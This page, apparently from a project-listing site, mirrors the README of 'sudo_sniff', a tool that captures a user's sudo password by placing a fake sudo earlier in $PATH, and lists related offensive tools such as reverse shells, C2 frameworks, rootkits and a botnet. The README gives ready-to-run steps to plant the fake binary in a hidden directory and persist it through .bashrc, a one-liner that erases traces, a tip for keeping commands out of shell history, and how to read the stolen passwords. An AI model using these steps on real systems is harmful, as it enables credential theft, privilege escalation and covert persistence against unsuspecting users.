All Projects → dubs3c → sudo_sniff

dubs3c / sudo_sniff

Licence: other
Steal user's password when running sudo for post-exploitation purposes

Programming Languages

c
50402 projects - #5 most used programming language
Makefile
30231 projects

Projects that are alternatives of or similar to sudo sniff

Msf Auxiliarys
My collection of metasploit auxiliary post-modules
Stars: ✭ 183 (+603.85%)
Mutual labels:  post-exploitation
Rspet
RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
Stars: ✭ 251 (+865.38%)
Mutual labels:  post-exploitation
ligolo-ng
An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
Stars: ✭ 418 (+1507.69%)
Mutual labels:  post-exploitation
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (+615.38%)
Mutual labels:  post-exploitation
Enumy
Linux post exploitation privilege escalation enumeration
Stars: ✭ 210 (+707.69%)
Mutual labels:  post-exploitation
Teardroid-phprat
🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio
Stars: ✭ 417 (+1503.85%)
Mutual labels:  post-exploitation
Enumdb
Relational database brute force and post exploitation tool for MySQL and MSSQL
Stars: ✭ 167 (+542.31%)
Mutual labels:  post-exploitation
Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
Stars: ✭ 601 (+2211.54%)
Mutual labels:  post-exploitation
Leprechaun
This tool is used to map out the network data flow to help penetration testers identify potentially valuable targets.
Stars: ✭ 232 (+792.31%)
Mutual labels:  post-exploitation
ToRat client
This is the ToRat client, a part of the ToRat Project.
Stars: ✭ 29 (+11.54%)
Mutual labels:  post-exploitation
Fudgec2
FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.
Stars: ✭ 191 (+634.62%)
Mutual labels:  post-exploitation
Hrshell
HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
Stars: ✭ 193 (+642.31%)
Mutual labels:  post-exploitation
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device.
Stars: ✭ 1,934 (+7338.46%)
Mutual labels:  post-exploitation
Poet
[unmaintained] Post-exploitation tool
Stars: ✭ 184 (+607.69%)
Mutual labels:  post-exploitation
AIX-for-Penetration-Testers
A basic AIX enumeration guide for penetration testers/red teamers
Stars: ✭ 31 (+19.23%)
Mutual labels:  post-exploitation
Zombieant
Zombie Ant Farm: Primitives and Offensive Tooling for Linux EDR evasion.
Stars: ✭ 169 (+550%)
Mutual labels:  post-exploitation
Credit-Card-Bruteforcer
Hacks credit card PAN numbers by using partial Hashes, and a list of random PAN [pins]
Stars: ✭ 50 (+92.31%)
Mutual labels:  post-exploitation
rpc2socks
Post-exploit tool that enables a SOCKS tunnel via a Windows host using an extensible custom RPC proto over SMB through a named pipe.
Stars: ✭ 126 (+384.62%)
Mutual labels:  post-exploitation
BURN
[WIP] Anti-Forensics ToolKit to clear post-intrusion sensible logfiles 🔥 (For Research Only)
Stars: ✭ 13 (-50%)
Mutual labels:  post-exploitation
AlanFramework
A C2 post-exploitation framework
Stars: ✭ 405 (+1457.69%)
Mutual labels:  post-exploitation

sudo_sniff

sudo_sniff is a simple program that attempts to steal the user's password while running sudo without arousing any suspicion. The idea is to modify the user's $PATH in order to hijack sudo when executed by the user. This could be used in post-exploitation as an alternative route for acheiving root acces (given that the user has the correct permissions).

sudo_sniff will store both correct and incorrect password entries at the following location per default: /tmp/.temp5678

Improvements

  • Hide the victim's input
  • Add function to either send the password to attacker or save it on disk.
  • sudo may be in different locations on different systems, perhaps implement a function to locate it
  • [BUG] When the victim enters his input, the text asking for the password will be printed multiple times.

Usage

hunter@nsa:~$ git clone [email protected]:mjdubell/sudo_sniff.git
hunter@nsa:~$ cd sudo_sniff/
hunter@nsa:~$ make
hunter@nsa:~$ ./sudo whoami

Post Exploitation

victim@server:~$ mkdir $HOME/.payload
victim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c
victim@server:~$ echo 'export PATH="$HOME/.payload:$PATH"' >> $HOME/.bashrc

Note: Make sure sudo is executable.

Cleanup
victim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH="$HOME\/\.payload:$PATH"/d' .bashrc > tmp && mv tmp .bashrc

Note: If the HISTCONTROL environment variable is set to "ignorespace" or "ignoreboth", adding a space before the command will prevent it from showing up when running history.

Retrieve the password
victim@server:~$ cat /tmp/.temp5678
victim:mypasword:ERROR
victim:mypassword:SUCCESS

Contributing

  1. Fork it!
  2. Create your feature branch: git checkout -b my-new-feature
  3. Commit your changes: git commit -am 'Add some feature'
  4. Push to the branch: git push origin my-new-feature
  5. Submit a pull request :D
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].